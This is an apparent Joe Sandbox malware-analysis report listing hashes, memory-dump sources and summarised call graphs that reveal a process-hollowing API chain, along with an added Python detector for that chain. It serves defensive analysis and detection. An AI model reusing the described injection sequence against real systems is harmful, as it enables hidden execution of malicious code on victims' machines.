                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad91a91a9b1d6b01f6b44d3628399ceb8a5552c36bbbbb346a007e7e3067e81e
                                              • Instruction ID: 166ae8c826d19b2454ee85b79a1e4dc7f42f9c0a4bec4adabe4441092210d1ce
                                              • Opcode Fuzzy Hash: ad91a91a9b1d6b01f6b44d3628399ceb8a5552c36bbbbb346a007e7e3067e81e
                                              • Instruction Fuzzy Hash: 3E315C70E1020A9FDB19DF64C99469EB7B6AF89310F208529E816E7780DB30AC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7be8f079f2dae598d695be543746cb52734a7acd43e555cd845069b8dde0e3b
                                              • Instruction ID: a2055ccd6edb5e9f8d2d8322afd2927611f199f4c689af0c91451d118e0ce615
                                              • Opcode Fuzzy Hash: b7be8f079f2dae598d695be543746cb52734a7acd43e555cd845069b8dde0e3b
                                              • Instruction Fuzzy Hash: 07315C30E1020A9FDB19DF64C99469EB7F6BF89300F208529E816E7790DB70AC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e55a6f73b1c7c2d71d6a5d1dd13ac113bad7cfbc8c29ea8ac08ab97e4dd5efdd
                                              • Instruction ID: 3f03d0fe2a8876d94f31fc22ea90d3bbe38e8eadc0fd898da641c055fbdd80d1
                                              • Opcode Fuzzy Hash: e55a6f73b1c7c2d71d6a5d1dd13ac113bad7cfbc8c29ea8ac08ab97e4dd5efdd
                                              • Instruction Fuzzy Hash: 0F21B175F012199FEB40DFA8D940AAEB7F5AB48220F104029E915EB380E734EC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64d100283c18b64a31e727c739ccec9cb370b66e2ffedc2c482dea0d3f8d5f31
                                              • Instruction ID: 76769dd53e6a29a868f32588796be2bde2a3559534420f47704b1e955b8c65eb
                                              • Opcode Fuzzy Hash: 64d100283c18b64a31e727c739ccec9cb370b66e2ffedc2c482dea0d3f8d5f31
                                              • Instruction Fuzzy Hash: 21217C75F112199FEB50DFA9E950AAEB7F5AB48260F144029E915EB380E734E8418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3724a22a38e071f99311e000dddc032479e723f5f8ddef7e494c6a3127a359f1
                                              • Instruction ID: e6cb6d7d485b532607761b72943e36e46be2191f2f5920cf6c810bce971d8ca3
                                              • Opcode Fuzzy Hash: 3724a22a38e071f99311e000dddc032479e723f5f8ddef7e494c6a3127a359f1
                                              • Instruction Fuzzy Hash: F11192317001151FEB6696BD981476BB7DADBC9620F24843AE10ACB791EA65EC0243E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0a272955248b6674aef1c998a544c66dfcb0b909f40a2e534fa62898c7e9f76
                                              • Instruction ID: 68dd1ba9c68508483858c5c1eeed8b22661af9077aeb2a2f1924ad321bd5b433
                                              • Opcode Fuzzy Hash: a0a272955248b6674aef1c998a544c66dfcb0b909f40a2e534fa62898c7e9f76
                                              • Instruction Fuzzy Hash: 7211A532B101694FEB94A6A8D8146AE73EBABC8211B144539C906EB384DE74DC0187D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fac41564ae1524ca01304ea1dc0796a592028bd9217a296f8c2e5d47281fc4c0
                                              • Instruction ID: 608e71d82b63ae4fc3fbe3c3a89f51bf6fe5b97aaf13cfa688687c3c67b89c69
                                              • Opcode Fuzzy Hash: fac41564ae1524ca01304ea1dc0796a592028bd9217a296f8c2e5d47281fc4c0
                                              • Instruction Fuzzy Hash: 1A012D36B111690FEF98A5A99C106EF76AFDBC8611F20413AD406DB784EE709C0647D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f327fbfba4939acd3dedc183388cfe079539f890aeb99bdd1b01b83d9a8dbf22
                                              • Instruction ID: 93f9a118a2e3408f1b3acda54940373909340ddd1258c3e6a4d41d409fa9230a
                                              • Opcode Fuzzy Hash: f327fbfba4939acd3dedc183388cfe079539f890aeb99bdd1b01b83d9a8dbf22
                                              • Instruction Fuzzy Hash: 6521F4B5D01259AFDB00CF9AD884BCEFBB4FB48724F10822AE518A7240C3756544CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e333ca5db6b9a1a0ef88fa97b194d89d5c64b311d64b3a017fa4911936cebb6
                                              • Instruction ID: 9a15d736706972cd41cbe0b647f8de27f43fae5fb705649b090c6b8b24946388
                                              • Opcode Fuzzy Hash: 8e333ca5db6b9a1a0ef88fa97b194d89d5c64b311d64b3a017fa4911936cebb6
                                              • Instruction Fuzzy Hash: 1411D3B1D01259AFDB00CF9AD884ACEFBB4FB48724F10822AE918A7640C3756554CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91b273e19c66038e9209e5d09d7dcfdd01f9183a85fe09cf9d658480c2063b05
                                              • Instruction ID: a44fd98e66cc0c99dab94cb357bcb08736f358f5e6de63585f712f0c803df561
                                              • Opcode Fuzzy Hash: 91b273e19c66038e9209e5d09d7dcfdd01f9183a85fe09cf9d658480c2063b05
                                              • Instruction Fuzzy Hash: 95016D31B001154FEB6596BE945472BB2DADBC9720F34883AE50BCB784EE61EC4243A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0f180033a5e3159c793f6ccb0c9552544fdea92c4dcf50c88b5e945f21192ae
                                              • Instruction ID: b7e2744a52f76b749dc5600f6f311ef5a9841185e58db1c121db48e0ea1e98d9
                                              • Opcode Fuzzy Hash: b0f180033a5e3159c793f6ccb0c9552544fdea92c4dcf50c88b5e945f21192ae
                                              • Instruction Fuzzy Hash: 0B01A230B041195FEB61EABCD56072A77DAEF89720F308839E50BC7794EA21EC068781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ebc8c332ce74f749e63c28f64423ef4652d3715d90aed23546d5e2a5fe9d91b2
                                              • Instruction ID: 5fc5144107eeb239d07e1771ef1d4d0e32d7c327584b91e19f8b0094cd012053
                                              • Opcode Fuzzy Hash: ebc8c332ce74f749e63c28f64423ef4652d3715d90aed23546d5e2a5fe9d91b2
                                              • Instruction Fuzzy Hash: 88014434B105195FEB65EABDD56471B77DAEB89720F308838E10BC7794EE21DC068781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6eda253df5d7c95e61da779ef35451a4cec9ee622eaaf0a2e58c5ef01355393
                                              • Instruction ID: 8aa13c6bb029d76dbfac2df2c9ba4f2cbe0d0d4c15c370ccc97c2a34b44cc799
                                              • Opcode Fuzzy Hash: f6eda253df5d7c95e61da779ef35451a4cec9ee622eaaf0a2e58c5ef01355393
                                              • Instruction Fuzzy Hash: E0F05832A04218CFFB648A54E9942A877F9EB413A0F384862D800939D8E3329E82CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e880a5427cd0d2349821d1444feaa0fb36dd13c0270bf351b1e2d5be1e9cb73
                                              • Instruction ID: d2801b7cf848963986ec0fc2180a44b13a2d693093b43795b78bef96b10ba328
                                              • Opcode Fuzzy Hash: 6e880a5427cd0d2349821d1444feaa0fb36dd13c0270bf351b1e2d5be1e9cb73
                                              • Instruction Fuzzy Hash: B2E06870E102087FEF50DE70C881B5A3BADCB42104F2044A1E40CCB683E536CA018340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb0a894ee9b8e9bda76913976d3422d52655494caf0d9b18a52d5b382cb7580e
                                              • Instruction ID: ca9d51b2cc5c5e5c2b9de054e9d8ac76eb94eb339762896de5b50b2224031e5d
                                              • Opcode Fuzzy Hash: fb0a894ee9b8e9bda76913976d3422d52655494caf0d9b18a52d5b382cb7580e
                                              • Instruction Fuzzy Hash: CEF0FE70A11129DFDB24DF90E859BADBB76FF88710F204519E402E7694CB741C41CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:11%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:220
                                              Total number of Limit Nodes:14
                                              execution_graph 25716 aa4668 25717 aa467a 25716->25717 25718 aa4686 25717->25718 25720 aa4778 25717->25720 25721 aa479d 25720->25721 25725 aa4888 25721->25725 25729 aa4878 25721->25729 25726 aa48af 25725->25726 25727 aa498c 25726->25727 25733 aa449c 25726->25733 25730 aa48af 25729->25730 25731 aa498c 25730->25731 25732 aa449c CreateActCtxA 25730->25732 25731->25731 25732->25731 25734 aa5918 CreateActCtxA 25733->25734 25736 aa59db 25734->25736 25746 aad0b8 25747 aad0fe GetCurrentProcess 25746->25747 25749 aad149 25747->25749 25750 aad150 GetCurrentThread 25747->25750 25749->25750 25751 aad18d GetCurrentProcess 25750->25751 25752 aad186 25750->25752 25753 aad1c3 25751->25753 25752->25751 25754 aad1eb GetCurrentThreadId 25753->25754 25755 aad21c 25754->25755 25756 aaad38 25757 aaad47 25756->25757 25760 aaae30 25756->25760 25768 aaae21 25756->25768 25761 aaae41 25760->25761 25763 aaae64 25760->25763 25761->25763 25776 aab0c8 25761->25776 25780 aab0b9 25761->25780 25762 aaae5c 25762->25763 25764 aab068 GetModuleHandleW 25762->25764 25763->25757 25765 aab095 25764->25765 25765->25757 25769 aaae41 25768->25769 25770 aaae64 25768->25770 25769->25770 25774 aab0c8 LoadLibraryExW 25769->25774 25775 aab0b9 LoadLibraryExW 25769->25775 25770->25757 25771 aaae5c 25771->25770 25772 aab068 GetModuleHandleW 25771->25772 25773 aab095 25772->25773 25773->25757 25774->25771 25775->25771 25777 aab0dc 25776->25777 25779 aab101 25777->25779 25784 aaa870 25777->25784 25779->25762 25781 aab0dc 25780->25781 25782 aab101 25781->25782 25783 aaa870 LoadLibraryExW 25781->25783 25782->25762 25783->25782 25785 aab2a8 LoadLibraryExW 25784->25785 25787 aab321 25785->25787 25787->25779 25737 23dd158 25738 23dd2e3 25737->25738 25739 23dd17e 25737->25739 25739->25738 25741 23dadbc 25739->25741 25742 23dd3d8 PostMessageW 25741->25742 25743 23dd444 25742->25743 25743->25739 25788 23d9ba4 25789 23d9ae5 25788->25789 25790 23d9acc 25788->25790 25794 23dbf70 
25789->25794 25815 23dbfde 25789->25815 25837 23dbf80 25789->25837 25795 23dbf80 25794->25795 25802 23dbfbe 25795->25802 25858 23dc5dc 25795->25858 25863 23dc4c1 25795->25863 25868 23dc9c4 25795->25868 25872 23dc845 25795->25872 25877 23dc66b 25795->25877 25882 23dc3c9 25795->25882 25886 23dc48e 25795->25886 25892 23dc6ee 25795->25892 25897 23dc44e 25795->25897 25902 23dc8cf 25795->25902 25907 23dc972 25795->25907 25912 23dc872 25795->25912 25917 23dc470 25795->25917 25922 23dc554 25795->25922 25927 23dc45a 25795->25927 25932 23dc57a 25795->25932 25938 23dc5fb 25795->25938 25942 23dc41f 25795->25942 25802->25790 25816 23dbfe1 25815->25816 25817 23dbf6c 25815->25817 25816->25790 25818 23dbfbe 25817->25818 25819 23dc5dc 2 API calls 25817->25819 25820 23dc41f 2 API calls 25817->25820 25821 23dc5fb 2 API calls 25817->25821 25822 23dc57a 2 API calls 25817->25822 25823 23dc45a 2 API calls 25817->25823 25824 23dc554 2 API calls 25817->25824 25825 23dc470 2 API calls 25817->25825 25826 23dc872 2 API calls 25817->25826 25827 23dc972 2 API calls 25817->25827 25828 23dc8cf 2 API calls 25817->25828 25829 23dc44e 2 API calls 25817->25829 25830 23dc6ee 2 API calls 25817->25830 25831 23dc48e 2 API calls 25817->25831 25832 23dc3c9 2 API calls 25817->25832 25833 23dc66b 2 API calls 25817->25833 25834 23dc845 2 API calls 25817->25834 25835 23dc9c4 2 API calls 25817->25835 25836 23dc4c1 2 API calls 25817->25836 25818->25790 25819->25818 25820->25818 25821->25818 25822->25818 25823->25818 25824->25818 25825->25818 25826->25818 25827->25818 25828->25818 25829->25818 25830->25818 25831->25818 25832->25818 25833->25818 25834->25818 25835->25818 25836->25818 25838 23dbf9a 25837->25838 25839 23dc5dc 2 API calls 25838->25839 25840 23dc41f 2 API calls 25838->25840 25841 23dc5fb 2 API calls 25838->25841 25842 23dc57a 2 API calls 25838->25842 25843 23dc45a 2 API calls 25838->25843 25844 23dc554 2 API calls 25838->25844 25845 23dbfbe 25838->25845 25846 23dc470 2 API calls 25838->25846 25847 
Call graph (tail of the graph from the preceding entry; the edge list is reduced to a summary): the 023D0000-region functions form the injection chain CreateProcessA (23d9524 / 23d9530), ReadProcessMemory (23d9390 / 23d9398), VirtualAllocEx (23d91e1 / 23d91e8), WriteProcessMemory (23d92a0 / 23d92a8), Wow64SetThreadContext (23d9108 / 23d9110) and ResumeThread (23d9058 / 23d9060). Each of these is reached from callers in the 23dc3c9-23dcc38 range (23dc3c9, 23dc44e, 23dc48e, 23dc4c1, 23dc51d, 23dc566, 23dc573, 23dc5fa, 23dc66b, 23dc6ee, 23dc845, 23dc872, 23dc8cf, 23dc8f7, 23dc938, 23dc972, 23dc9c4, 23dcc38), and the 23dc41f / 23dc428 callers are shown invoking ResumeThread with edges returning to the caller. A separate graph shows aad300 calling DuplicateHandle and continuing at aad396.
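The call graph above records the classic RunPE / process-hollowing sequence: CreateProcessA, ReadProcessMemory (the child's PEB, to learn its image base), VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread. The detector below is an added example and not part of the Joe Sandbox report or of the sample: it walks an API-call trace and flags a process that creates a child and then, in order, writes into it, sets a thread context and resumes it. The `Call` record layout, the `target` field (handle or pid of the process being operated on) and the sample trace are constructed assumptions; the report itself shows the CreateProcessA arguments as `?`, so whether CREATE_SUSPENDED was passed is not visible here, and the example only records that flag when a trace exposes it.

```python
"""Flag a RunPE / process-hollowing API chain in an API-call trace.

Added example for this report, not Joe Sandbox code. The Call record layout,
the `target` field (handle or pid of the process being operated on) and the
sample trace are constructed assumptions; the API names are the ones the
report's call graph shows for the 023D0000 region.
"""
from dataclasses import dataclass, field

# Ordered stages of the chain: (stage name, API names that satisfy it, required?).
# Reading the child's PEB and allocating remote memory are typical but not
# necessary for the technique, so those two stages are optional.
STAGES = [
    ("create",      {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}, True),
    ("read_peb",    {"ReadProcessMemory", "NtReadVirtualMemory"}, False),
    ("alloc",       {"VirtualAllocEx", "NtAllocateVirtualMemory"}, False),
    ("write",       {"WriteProcessMemory", "NtWriteVirtualMemory"}, True),
    ("set_context", {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"}, True),
    ("resume",      {"ResumeThread", "NtResumeThread"}, True),
]
CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit (Win32 constant)


@dataclass
class Call:
    pid: int          # calling process
    api: str          # API name as logged by the tracer
    target: int       # process handle/pid the call operates on (assumed field)
    flags: int = 0    # dwCreationFlags for CreateProcess*, otherwise 0


@dataclass
class Finding:
    pid: int
    target: int
    stages: list = field(default_factory=list)
    suspended: bool = False   # True only if CREATE_SUSPENDED was visible in the trace


def _stage_of(api):
    for i, (_name, apis, _required) in enumerate(STAGES):
        if api in apis:
            return i
    return None


def detect_hollowing(trace):
    """Return a Finding for every (pid, target) whose calls follow the chain in order."""
    state = {}     # (pid, target) -> [last stage index, stage names seen, suspended?]
    findings = []
    for c in trace:
        i = _stage_of(c.api)
        if i is None:
            continue                      # unrelated API
        key = (c.pid, c.target)
        if i == 0:
            # A CreateProcess* (re)starts the chain for this child.
            state[key] = [0, ["create"], bool(c.flags & CREATE_SUSPENDED)]
            continue
        if key not in state:
            continue                      # remote ops on a process this pid did not create: not RunPE
        last, seen, _susp = state[key]
        if i < last:
            continue                      # an earlier stage repeating after we moved on
        # Every *required* stage between the last one and this one must already be done,
        # so e.g. SetThreadContext without a prior WriteProcessMemory does not advance.
        if any(STAGES[k][2] for k in range(last + 1, i)):
            continue
        if STAGES[i][0] not in seen:
            seen.append(STAGES[i][0])
        state[key][0] = i
        if i == len(STAGES) - 1:          # ResumeThread closes the chain
            findings.append(Finding(c.pid, c.target, list(seen), state[key][2]))
            del state[key]
    return findings


# Constructed sample trace (not taken from the report). pid 9 spawns a child
# (handle 0x1C4) and hollows it with the same API names the call graph shows;
# pid 12 only creates a child and resumes it, which must not be flagged.
SAMPLE_TRACE = [
    Call(9, "CreateProcessA", 0x1C4, flags=CREATE_SUSPENDED),
    Call(9, "ReadProcessMemory", 0x1C4),       # PEB -> ImageBaseAddress
    Call(9, "VirtualAllocEx", 0x1C4),
    Call(9, "WriteProcessMemory", 0x1C4),      # headers
    Call(9, "WriteProcessMemory", 0x1C4),      # sections
    Call(9, "Wow64SetThreadContext", 0x1C4),   # redirect the main thread's entry point
    Call(9, "ResumeThread", 0x1C4),
    Call(12, "CreateProcessA", 0x2A0, flags=CREATE_SUSPENDED),
    Call(12, "WaitForSingleObject", 0x2A0),
    Call(12, "ResumeThread", 0x2A0),
]

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f"pid {f.pid} hollowed target {f.target:#x}: {' -> '.join(f.stages)}"
              f" (suspended={f.suspended})")
```

The detector deliberately keys on the creating process: a WriteProcessMemory or SetThreadContext against a process the caller did not itself create is a different injection pattern and is left to other rules. Repeated WriteProcessMemory calls (headers, then each section, as the graph's multiple 23d92a0 / 23d92a8 edges suggest) collapse into one stage, and a ResumeThread that is not preceded by a write and a context change does not produce a finding, so a plain CreateProcess-then-resume does not alert.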

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD136
                                              • GetCurrentThread.KERNEL32 ref: 00AAD173
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 00AAD209
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: dc4baa565b8a18f69428c70d80471cd1c9bbe232cfaba64d8b18a52f73c40f01
                                              • Instruction ID: cdb328e1e95763fbea31ba3bc45859e0180123352e0e5bb0efe8c528ed2fa7e1
                                              • Opcode Fuzzy Hash: dc4baa565b8a18f69428c70d80471cd1c9bbe232cfaba64d8b18a52f73c40f01
                                              • Instruction Fuzzy Hash: 255165B0900249CFDB14CFAAD548BEEBFF1EF89314F20859AE009A72A1DB345944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD136
                                              • GetCurrentThread.KERNEL32 ref: 00AAD173
                                              • GetCurrentProcess.KERNEL32 ref: 00AAD1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 00AAD209
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: d089300c17f7e1a19b4401d9ef9c4ea0a0433f983101f0ca98406c7593248f23
                                              • Instruction ID: 8211e6140bb5843bf61e91c1eb813cb9fe21f5de3120c802fa3c55a7e48576d0
                                              • Opcode Fuzzy Hash: d089300c17f7e1a19b4401d9ef9c4ea0a0433f983101f0ca98406c7593248f23
                                              • Instruction Fuzzy Hash: 805154B0D00249DFDB14CFAAD548B9EBBF1EF89314F208559E409A73A0DB749944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9524-23d95c5; three loop-containing regions (23d95c7-23d95fb, 23d9620-23d9654, 23d9688-23d96bc) lead to 23d96bf-23d9779, which calls CreateProcessA; its successors are 23d977b-23d9781 and 23d9782-23d9808, followed by a chain of small blocks 23d980a-23d986e that ends in a self-looping block at 23d9875.
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023D9766
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 26a262838fd556b5de4b8f0c07d3ccdb47b429373ec222f9cc52de38351c827a
                                              • Instruction ID: af4c4cc525fd55dc798058e650397a51eb4648deb191372a2ea36124c5a998e9
                                              • Opcode Fuzzy Hash: 26a262838fd556b5de4b8f0c07d3ccdb47b429373ec222f9cc52de38351c827a
                                              • Instruction Fuzzy Hash: 2CA16C72D00259DFEF20CF68D841BEEBBB2BF48714F0481A9E809A7240DB759985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9530-23d95c5; three loop-containing regions (23d95c7-23d95fb, 23d9620-23d9654, 23d9688-23d96bc) lead to 23d96bf-23d9779, which calls CreateProcessA; its successors are 23d977b-23d9781 and 23d9782-23d9808, followed by a chain of small blocks 23d980a-23d986e that ends in a self-looping block at 23d9875.
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023D9766
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 8c24b48bccfceba13096e5c746226d52b7f6306209d2a39e15f116a59afafea3
                                              • Instruction ID: 5ad9fcea7572a85a5631474fa13e5e9b2fb23f42aad3a55093a19c3c8fb19bc6
                                              • Opcode Fuzzy Hash: 8c24b48bccfceba13096e5c746226d52b7f6306209d2a39e15f116a59afafea3
                                              • Instruction Fuzzy Hash: ED915C72D00259CFEF20DF69D841BEEBBB2BF48714F1481A9E809A7240DB759985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block aaae30-aaae3f; the function calls the internal helpers aa9838, aab0c8 / aab0b9, aaa814, aaa824, aaa834 and aaa844 on its way to aaafa0-aab060, from which aab068-aab093 (reached directly or via aab062-aab065) calls GetModuleHandleW; successors are aab095-aab09b and aab09c-aab0b0 (the former falls through to the latter).
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 21a617f700693d8630f6393458960e3fa900e3283ce6a358d7e29697357f8f20
                                              • Instruction ID: 3496cdd38eb5857a407ed03ccf1bd411fc2b2b393423c18be9344825d318d44e
                                              • Opcode Fuzzy Hash: 21a617f700693d8630f6393458960e3fa900e3283ce6a358d7e29697357f8f20
                                              • Instruction Fuzzy Hash: 57716770A00B058FDB24DF2AD45079ABBF1FF89700F108A2EE44AD7A90D775E849CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block aa590c-aa59d9 calls CreateActCtxA; successors aa59db-aa59e1 and aa59e2-aa5a3c, then aa5a3e-aa5a41 / aa5a4b-aa5a4f, aa5a51-aa5a5d and aa5a60, ending in a self-looping block at aa5a61.
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00AA59C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4c932eabfa6a398ab07fde23b1d6eb26951948ca41d0fc229c752b0f016db07c
